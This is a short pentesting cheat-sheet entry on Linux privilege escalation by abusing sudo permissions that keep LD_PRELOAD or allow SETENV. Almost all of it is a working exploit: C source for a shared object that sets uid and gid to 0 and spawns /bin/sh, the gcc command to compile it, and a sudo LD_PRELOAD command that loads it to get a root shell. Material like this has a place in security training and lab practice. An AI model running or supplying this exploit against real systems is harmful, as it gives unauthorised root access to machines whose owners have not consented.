LD_Preload / SETENV
There are a couple of different ways I have found this to work:
1. In the below image, if you see the marked area when running sudo -l then you should be good to go.
2. If you run sudo -l and see SETENV under sudo permissions then I would also try this. Note: I had a file path after SETENV when this worked. I have not tried it with a bin, so I can't verify if it works the same.
On attacker machine create a file called shell.c with the following code.
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/sh");
}
2. Build the shell.c code into shell.co
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
3. Transfer the shell.so file to the target machine.
4. Run the code below to get a root shell. Replace the /usr/bin/ping with the path specified in the output from sudo -l.
sudo LD_PRELOAD=/tmp/shell.so /usr/bin/ping
Last updated